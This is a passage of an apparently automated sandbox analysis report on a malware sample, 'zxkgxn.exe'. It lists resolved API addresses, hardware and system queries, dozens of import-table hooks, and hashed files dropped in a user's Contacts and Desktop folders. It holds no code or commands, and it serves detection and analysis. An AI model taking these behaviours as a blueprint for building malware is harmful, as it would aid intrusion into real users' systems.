Get Address	c:\windows\syswow64\advapi32.dll	function = CloseServiceHandle, address_out = 0x74d5369c	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetPathFromIDListW, address_out = 0x760617bf	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetSpecialFolderLocation, address_out = 0x7605e141	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = CommandLineToArgvW, address_out = 0x75fe9ee8	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteA, address_out = 0x76217078	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteExW, address_out = 0x75ff1e46	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitialize, address_out = 0x755fb636	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitializeSecurity, address_out = 0x75607259	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoUninitialize, address_out = 0x756286d3	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstance, address_out = 0x75629d0b	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 202, address_out = 0x7522fd6b	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 2, address_out = 0x75224642	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 9, address_out = 0x75223eae	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 8, address_out = 0x75223ed5	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 6, address_out = 0x75223e59	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 200, address_out = 0x75223f21	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 12, address_out = 0x75225dee	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 201, address_out = 0x75224af8	1	Fn
Get Address	c:\windows\syswow64\iphlpapi.dll	function = GetAdaptersInfo, address_out = 0x74b59263	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 12, address_out = 0x75bcb131	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 11, address_out = 0x75bc311b	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 52, address_out = 0x75bd7673	1	Fn
Get Address	c:\windows\syswow64\dnsapi.dll	function = DnsQuery_W, address_out = 0x74a9572c	1	Fn
Get Address	c:\windows\syswow64\dnsapi.dll	function = DnsFree, address_out = 0x74a8436b	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptStringToBinaryA, address_out = 0x759e5d77	1	Fn
Get Address	c:\windows\syswow64\msvcr100.dll	function = atexit, address_out = 0x749dc544	1	Fn

System (254)

Operation	Additional Information	Count	Logfile
Get Time	type = System Time, time = 2019-06-30 09:01:33 (UTC)	1	Fn
Get Time	type = Performance Ctr, time = 17717665900	1	Fn
Get Time	type = System Time, time = 2019-06-30 09:01:35 (UTC)	1	Fn
Get Time	type = Performance Ctr, time = 17957585446	1	Fn
Get Info	type = Hardware Information	249	Fn
Get Info	type = Operating System	1	Fn

Environment (2)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		2	Fn Data

Process #11: zxkgxn.exe

3461

Information	Value
ID	#11
File Name	c:\users\5p5nrgjn0js halpmcxz\appdata\local\23aa8f91-8e4c-4e01-8a6f-bd3657c0ac36\zxkgxn.exe
Command Line	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\23aa8f91-8e4c-4e01-8a6f-bd3657c0ac36\zxkgxn.exe" --AutoStart
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:34, Reason: Autostart
Unmonitor	End Time: 00:04:26, Reason: Terminated by Timeout
Monitor Duration	00:02:52

OS Process Information

Information	Value
PID	0x4d8
Parent PID	0x3a8 (c:\windows\system32\audiodg.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 4DC 0x 6E4 0x 6E8 0x 6EC 0x 6F0 0x 6F4 0x 6F8 0x 348 0x 594 0x 60C 0x 618 0x 56C 0x 6FC 0x 658

Memory Dumps

Name	Start VA	End VA	Dump Reason	PE Rebuilds	Bitness	Entry Points	AV	YARA	Actions
zxkgxn.exe	0x00400000	0x004A2FFF	Relevant Image	-	32-bit	-			... Region Actions Download Dump

Hook Information

Type	Installer	Target	Size	Information	Actions
IAT	private_0x00000000005c0000:+0x5aa27	1. entry of zxkgxn.exe	4 bytes	ntdll.dll:RtlReAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x6a00fffb	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	5. entry of zxkgxn.exe	4 bytes	kernel32.dll:WaitForSingleObject+0x0 now points to private_0x000000007fff0000:+0x4784078b	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	6. entry of zxkgxn.exe	4 bytes	kernel32.dll:SetTapeParameters+0x0 now points to private_0x000000007fff0000:+0x68868904	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	7. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetModuleHandleW+0x0 now points to private_0x000000007fff0000:+0x600fffb	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	8. entry of zxkgxn.exe	4 bytes	kernel32.dll:ExpandEnvironmentStringsA+0x0 now points to private_0x000000007fff0000:+0x78868bc0	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	9. entry of zxkgxn.exe	4 bytes	kernel32.dll:WaitNamedPipeW+0x0 now points to private_0x000000007fff0000:+0xa00fffb	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	10. entry of zxkgxn.exe	4 bytes	kernel32.dll:EnumTimeFormatsA+0x0 now points to private_0x000000007fff0000:+0x7ffcf0bd	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	11. entry of zxkgxn.exe	4 bytes	kernel32.dll:LoadLibraryW+0x0 now points to private_0x000000007fff0000:+0x7c8a0fff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	12. entry of zxkgxn.exe	4 bytes	kernel32.dll:Sleep+0x0 now points to private_0x000000007fff0000:+0x3010008	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	13. entry of zxkgxn.exe	4 bytes	kernel32.dll:FormatMessageW+0x0 now points to private_0x000000007fff0000:+0x7ffce88d	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	14. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetStringTypeExW+0x0 now points to private_0x000000007fff0000:+0x70eaffff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	16. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetSystemDirectoryA+0x0 now points to private_0x000000007fff0000:+0x7ffce88d	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	17. entry of zxkgxn.exe	4 bytes	kernel32.dll:CreateMailslotW+0x0 now points to private_0x000000007fff0000:+0x37100aff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	18. entry of zxkgxn.exe	4 bytes	kernel32.dll:WritePrivateProfileStringW+0x0 now points to private_0x000000007fff0000:+0x50c283c2	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	19. entry of zxkgxn.exe	4 bytes	kernel32.dll:ReplaceFileA+0x0 now points to private_0x000000007fff0000:+0x58ac103	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	20. entry of zxkgxn.exe	4 bytes	kernel32.dll:EnumSystemLocalesA+0x0 now points to private_0x000000007fff0000:+0x8000fbe8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	21. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetProfileIntA+0x0 now points to private_0x0000000000050000:+0x3cae9	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	22. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetLastError+0x0 now points to private_0x000000007fff0000:+0x42b80f00	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	28. entry of zxkgxn.exe	4 bytes	kernel32.dll:FindFirstVolumeMountPointW+0x0 now points to private_0x000000007fff0000:+0x7bf9858b	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	29. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetProfileStringA+0x0 now points to private_0x000000007fff0000:+0x510ffff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	32. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetDefaultCommConfigA+0x0 now points to private_0x000000007fff0000:+0x7cea0000	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	33. entry of zxkgxn.exe	4 bytes	kernel32.dll:VirtualProtect+0x0 now points to private_0x000000007fff0000:+0xc00fffe	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	34. entry of zxkgxn.exe	4 bytes	ntdll.dll:RtlDeleteCriticalSection+0x0 now points to private_0x000000007fff0000:+0x7ffcf885	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	36. entry of zxkgxn.exe	4 bytes	kernel32.dll:MoveFileWithProgressW+0x0 now points to private_0x000000007fff0000:+0x40841475	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	37. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetConsoleProcessList+0x0 now points to pagefile_0x00000000009f0000:+0x2c8102	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	38. entry of zxkgxn.exe	4 bytes	kernel32.dll:WriteConsoleW+0x0 now points to private_0x000000007fff0000:+0x9010010	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	39. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetStringTypeW+0x0 now points to private_0x000000007fff0000:+0x7ffcf885	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	40. entry of zxkgxn.exe	4 bytes	kernel32.dll:ReadConsoleW+0x0 now points to private_0x000000007fff0000:+0x7edee9ff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	41. entry of zxkgxn.exe	4 bytes	kernel32.dll:ReadFile+0x0 now points to private_0x000000007fff0000:+0x4b84ffff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	42. entry of zxkgxn.exe	4 bytes	kernel32.dll:OutputDebugStringW+0x0 now points to private_0x000000007fff0000:+0x7ed6e910	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	44. entry of zxkgxn.exe	4 bytes	kernel32.dll:SetStdHandle+0x0 now points to private_0x000000007fff0000:+0x69d90b58	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	45. entry of zxkgxn.exe	4 bytes	kernel32.dll:EnumSystemLocalesW+0x0 now points to private_0x000000007fff0000:+0x8000fed9	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	46. entry of zxkgxn.exe	4 bytes	kernel32.dll:HeapFree+0x0 now points to private_0x000000007fff0000:+0x7bf9858b	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	47. entry of zxkgxn.exe	4 bytes	ntdll.dll:RtlEncodePointer+0x0 now points to private_0x000000007fff0000:+0x3710ffff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	49. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetCommandLineA+0x0 now points to private_0x000000007fff0000:+0x3d8c2375	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	50. entry of zxkgxn.exe	4 bytes	kernel32.dll:RaiseException+0x0 now points to private_0x000000007fff0000:+0x8000fbf8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	52. entry of zxkgxn.exe	4 bytes	kernel32.dll:IsDebuggerPresent+0x0 now points to private_0x000000007fff0000:+0xb177534	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	54. entry of zxkgxn.exe	4 bytes	ntdll.dll:RtlEnterCriticalSection+0x0 now points to private_0x000000007fff0000:+0x1cb81	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	55. entry of zxkgxn.exe	4 bytes	ntdll.dll:RtlLeaveCriticalSection+0x0 now points to private_0x000000007fff0000:+0x58a0000	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	56. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetStdHandle+0x0 now points to private_0x000000007fff0000:+0x8000fbf8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	57. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetFileType+0x0 now points to private_0x000000007fff0000:+0x7fff9ae9	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	59. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetProcessHeap+0x0 now points to private_0x000000007fff0000:+0x3d8c2375	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	60. entry of zxkgxn.exe	4 bytes	ntdll.dll:RtlAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x8000fbf8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	62. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetModuleHandleExW+0x0 now points to private_0x000000007fff0000:+0xb177532	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	64. entry of zxkgxn.exe	4 bytes	kernel32.dll:AreFileApisANSI+0x0 now points to private_0x000000007fff0000:+0xe381	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	65. entry of zxkgxn.exe	4 bytes	kernel32.dll:MultiByteToWideChar+0x0 now points to private_0x000000007fff0000:+0x58affff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	66. entry of zxkgxn.exe	4 bytes	kernel32.dll:WideCharToMultiByte+0x0 now points to private_0x000000007fff0000:+0x8000fbf8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	67. entry of zxkgxn.exe	4 bytes	ntdll.dll:RtlSizeHeap+0x0 now points to private_0x000000007fff0000:+0x7fff72e9	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	68. entry of zxkgxn.exe	4 bytes	kernel32.dll:CloseHandle+0x0 now points to private_0x000000007fff0000:+0x53c66ff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	69. entry of zxkgxn.exe	4 bytes	kernel32.dll:SetLastError+0x0 now points to private_0x000000007fff0000:+0x8000fb8c	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	72. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetModuleFileNameA+0x0 now points to private_0x000000007fff0000:+0x7ffc8885	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	73. entry of zxkgxn.exe	4 bytes	kernel32.dll:WriteFile+0x0 now points to private_0x000000007fff0000:+0x7e850fff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	75. entry of zxkgxn.exe	4 bytes	kernel32.dll:QueryPerformanceCounter+0x0 now points to private_0x000000007fff0000:+0x7b99853b	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	76. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetCurrentProcessId+0x0 now points to private_0x000000007fff0000:+0x410ffff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	79. entry of zxkgxn.exe	4 bytes	kernel32.dll:FreeEnvironmentStringsW+0x0 now points to private_0x0000000000050000:+0x2e884	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	83. entry of zxkgxn.exe	4 bytes	kernel32.dll:CreateEventW+0x0 now points to private_0x000000007fff0000:+0x7ffc9085	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	84. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetCurrentProcess+0x0 now points to private_0x000000007fff0000:+0x52850fff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	86. entry of zxkgxn.exe	4 bytes	kernel32.dll:TlsAlloc+0x0 now points to private_0x000000007fff0000:+0x4c8689c0	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	87. entry of zxkgxn.exe	4 bytes	kernel32.dll:TlsGetValue+0x0 now points to private_0x000000007fff0000:+0xe00fffb	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	88. entry of zxkgxn.exe	4 bytes	kernel32.dll:TlsSetValue+0x0 now points to private_0x000000007fff0000:+0x7ffce085	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	89. entry of zxkgxn.exe	4 bytes	kernel32.dll:TlsFree+0x0 now points to private_0x000000007fff0000:+0x5486c7ff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	92. entry of zxkgxn.exe	4 bytes	kernel32.dll:FatalAppExitA+0x0 now points to private_0x000000007fff0000:+0x7bd9b5ff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	93. entry of zxkgxn.exe	4 bytes	kernel32.dll:IsValidCodePage+0x0 now points to private_0x000000007fff0000:+0x6853ffff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	95. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetOEMCP+0x0 now points to private_0x000000007fff0000:+0x690dc483	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	97. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetConsoleCP+0x0 now points to private_0x000000007fff0000:+0x3c3b70f	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	98. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetConsoleMode+0x0 now points to private_0x000000007fff0000:+0xf1064f8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x5aa27	101. entry of zxkgxn.exe	4 bytes	kernel32.dll:FreeLibrary+0x0 now points to private_0x000000007fff0000:+0x78840000	... Actions Go to Installer Region Go to Target Region

Dropped Files

Filename	File Size	Hash Values	Actions
C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact	1.23 KB	MD5: 7f3a1e22abd0aeedd704545603890d33 SHA1: 92238d924ead2a728a3d5dea093bdea77cc79c30 SHA256: fe0257dd3fff4021f21579705f22e9d4ebdb273010e31e8b580a98890b7c2228 SSDeep: 24:+42YBjy9cRGkeCcBv9SfUIWmvOPnMHmfcrC/RlZ8huSUWbD:+/tI9MMH1iRkuaD	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact	66.86 KB	MD5: 09ea9b11071f825dad2b52a39be79549 SHA1: df0ea86d26ff87309849e797a0680d3c38c13daf SHA256: e229cde1939f044bcc75e2949b76e0792db934937e81b3609d0226cede0e2db1 SSDeep: 1536:hgEDLOLDlPZ0YHt2sqvYBb97VXP6s2OBveJdf3Y6zpZrsfikx3:R4DlPZ0Y0A17XiNOJeJh3Y6zvsfi4	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact	1.22 KB	MD5: 0a6c08f712f981c8dc7f03f71b3478c4 SHA1: 16f2f1ccb816e9dac33aa27b12eed40e4c61b389 SHA256: ca51bd5cb096e22e00b2728cd2471ec9a627e9301a04a47708109c1cd1ae1184 SSDeep: 24:+42YBjy9cRGkeBn/v9S+t9O9XnTvrlsMeImgQWjxf0PEgcfXQxUWbD:+/DBDanlsstKEgw8D	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact	1.23 KB	MD5: fc28be47817c2ce2327a194f769df963 SHA1: 3a12e40dc717d6c55f10fe491490c2aa98884055 SHA256: 4e26a5608708b00412e77dd8dc08d1ac42fef5a9a9e173ef7f999b66bbb0b4d2 SSDeep: 24:+42YBjy9cRGkeon5sXv9StsuLL43OAOcuEywlr7iJ/I7rL+UWbD:+/i+XaZvEvgwl3j7rKD	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact	1.22 KB	MD5: 8fdaac8956c1a5b870ae588ce986eeb0 SHA1: 3f4a7538564518c6f32deb53f528d28bd6e946f9 SHA256: 9ce3b6b75b1384ad80b5e1dd8dc9a3883bace149b1b75fc7c1f2e2420ea5767f SSDeep: 24:+42YBjy9cRGke6Jy6ev9SYfhKeK/NDVci0sP71qjtOtEjnHfUWbD:+/ptHfcltVcpsz1Y4ulD	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0N28733.jpg	23.28 KB	MD5: 39a812817fd23e3dbb13f254449db193 SHA1: d8dec8fb2d2b027956041f859047738f1d5272d0 SHA256: 4887e905aaf0a00fc5608da05ea9261452a8ff077bd1a05ab7fddba25e3db032 SSDeep: 384:Y4z9u6FI0gO/j3YnBCA8PYRN9pO21ELwR67AmPcK11VKFMZBpnhXt8Dfe7f28/I:Y4plI0f3MBCsZsU6rciKcpptGfe7f8	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\2_-YQaqX40ls7kZnQI.png	41.95 KB	MD5: 84546efbf4fe5b46c8f503dab99b5db8 SHA1: d272b192a3ef5c772da52e273cfd0ddd68e9b287 SHA256: 6e97a64947fe12a0a525f297f5778b646608119cd5d68d307488c3644eb8339e SSDeep: 768:iyppUls7VYzPkd2kgcNNgaOit87Ft+IPxd6FeLeEd/3yjArcjY9jRx0XGxom:ssY9tqkvB8eeFsZ35Y89jRx0X4T	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\4hZE9nFAdJv.png	70.76 KB	MD5: 0e8048e9d08fa1e8bbd3e45b75560f3e SHA1: fc947cd000cf0d84a84a42be70e5bae45b25afc7 SHA256: 1e52dbf346d698969393e4c802ad09c81be8445a516a68ec499a1c7968d78505 SSDeep: 1536:KixiGFdp4PaAEqBATjynxoO5xiLGMRCrJiuW+ghAY8yx8W/:KPUdHJPyuO5QKMoNhW1L8yx8W/	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\6bvJUbgBGTbsIJMKW8.jpg	88.75 KB	MD5: 64d950e93f70978143cd17d1d3eeae46 SHA1: 844c751590ead9ffc4cf19d974f9fcce41de3204 SHA256: 86d0863fdb6bf2f10cc4a48f31feca944fa9e390415ec2e697370becf8ec3877 SSDeep: 1536:7weV1AjpSq9GmCLMLwYSN4O1JHSiV+gkJSeVCZwI+mzqa/Db12+Xm4QoSG:7BcSSGm6EXwSiVjkMeSw14qa/DboCm/Q	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\6igNpwR0pgLT9a.m4a	80.07 KB	MD5: 98202a4d827cabbf02508101f3339b4a SHA1: a16d548bf75acf89b74bdea417643a8b4cafbdf6 SHA256: 1daf3f5716db133bad3733a44e500a56dd37f45311aeaaff316c6790c04905f8 SSDeep: 1536:jHnFyrva9RPzMf9Yjx5YMVJ/MMTdNDGw03bzrngd5J4w6shfL:jHnFsyf7MfOQU3o3P7HwD	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\75tKv_wPWu nle.flv	71.45 KB	MD5: 00729911de8b7f08665921d9f1d19b63 SHA1: f33aa4f20964ab305bdac00d8275bee9f2177d9d SHA256: 334f9847d8f12f52df918c5d591a24b46e7f978c987bafb10a5fb2db604ea7f9 SSDeep: 1536:9L4V4DuFK+LQWnlK7FyHSsXj+shPjT3eRQI9hHLvj:a4wK+LQEQ78HzPjT3elvLj	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iMKYkmcr3Dm3Fk6ffK.ots	45.20 KB	MD5: 4b44619b4694322e84853123819c550e SHA1: 17122f57295014a20f6f814a1be4918a29b943b0 SHA256: a01780c0f3eb06a59b72ab34731807281f77b77a1394266478e383ea46db4ede SSDeep: 768:6zcDEjs165feVpczDXO15zD/ZecNpbIGeDUcf/oM81Qi6ct4LIW0VMwcNglKOse3:fofD3XO19D/AcA9D1nozyi/E0VM2K7u9	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\kP8ULRqZpLx.m4a	82.65 KB	MD5: a68ea30faf2a10e315e42993f2054a3f SHA1: 7c514abaf24f7da7c055bbc937420a0005adf4b8 SHA256: e792320a790b220d34150bc62e287ed8375280f8aa02a10fd54ef2536bf40e60 SSDeep: 1536:DrWlL8Ymm9gMVKsJwHWFVSMzE4ygU9wlfUWjmTqxbDqihcEngAAgMAF1Ty2x:DrAL8ZoLDi2FVSQcguCkFied8m2x	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\OXbBkJHSc.ods	85.73 KB	MD5: 7d45b7de58677fc09a719b1d7e493515 SHA1: 7cf352d7bf18f281baa504f18d4cba90b70f82a7 SHA256: a45f4a237fdd7852caa6daadc1c543749befbe29e2c8b6cd7365026159498f47 SSDeep: 1536:Ty4WjabOiO+ekYWYnBpointhHhQkpTYHt7Hlqh7uSt4fE/w0TgqRopXR8IhEM3JH:RW+FvEdthqWMN7HEh/tIwgqRYRpEM5Hn	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\p41R3hPr.swf	20.29 KB	MD5: 7a813c3e3151c2c615e4fe0acd4c397a SHA1: 93a877c5520f6eccde1f129a59644cfbe83cce4e SHA256: 2ee36e170b9b684d538ab435f43520ea2731772f9f8052c96a27e4ced7a7d07f SSDeep: 384:Cy9aslzRyVpAc6ByYWJHbACg+2pKl6OJ9LD3dzXv3p9opeaGBTFj5k:PayzRyVp/YoHMCRgKAsP35fwpeTx5k	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\pAeUc4J9behwUSLh5ZK.ppt	67.46 KB	MD5: 106251843b98c2dbe8a665fa8d569430 SHA1: 89e1aeaff5f215e6a5677af970de97e089885028 SHA256: 52c5bad992d2d4d889d222f10d82bdea75f0ac6c9c4aad20d3295ea938d90ec4 SSDeep: 1536:x8w9sNSUsWj6SDkma9ulOwxV4NkSewCqXpZtQ9ztL+e8/XUZ8n:aEsNgtEzOwx49ewCKvt+ztSRbn	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\PolmUMHRORMWgP.swf	48.66 KB	MD5: 299491b490ae3a6118ded4c70fdf899c SHA1: 03bf39ca2e4d5f13867a378ca4144e1d1e40ef9a SHA256: a6f8e06102627f9db6fe80be81873f1b775acf2939797ac62d1b4640c5bb9234 SSDeep: 768:mZkP3ysQ2FnE9B38o0NMUPTDwAdhyed0LgL9X3vVjmaOqnyVrtUFaGiwpJHM8qNC:pyi6BdhqvwWyHgL9nvRmtUFagrBqFe	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\qTEbn_aHVk98J.pdf	40.45 KB	MD5: 216979996dd05de792958004a8c5994a SHA1: cef4040cedd176745d9631cbd1680a9380c395e3 SHA256: f409c60f67a1068e18de8547ec987668ec5e726a9055d930ce0dd8f87505b6e7 SSDeep: 768:eVZpHr9tMmgUC0gXaulPg5N95e08mEjOEdaM9CeGdGChClzNrY+dHrVJDLWnRJPO:epHrMmgU3gKulPgX95PwDbGToVV97WfG	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\q_qr72fTT.mkv	53.97 KB	MD5: 32727bcba21608d3247cf24ebeffd8b6 SHA1: 3b98b584578ad6148a0a83c03e62c27a9f60f8a1 SHA256: 8b0d0bb8d0cdc8fa3ab88419cbb240b0deecb92b21ab4070332d788a159d9a86 SSDeep: 1536:Tt/ck9hFScHilGyCO9+nCoGjsj/OBsFVplYKpddO6dzsfOHgc5qv:ThzFScCkyCO9zoGjGM4lhddzxAZ	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\rzNuUzflSMr4Y.wav	36.38 KB	MD5: b7351eacd0ea3bd568fbb05fd1c01d08 SHA1: 59d6fff8b9d11c859e98c3c84d537c5896919064 SHA256: 5b9de49fa14d4991c96e9858c4bf5f6c73a79ab7efeb8c1b7c93e069334d8371 SSDeep: 768:Kfy89Q1HtHGfPLhhB7w9end/RdL6KwmtpzjTzYNr+cka:qNYNHaLhf7w9Gd/z6vm3zqr+cka	... File Actions Show Properties Download
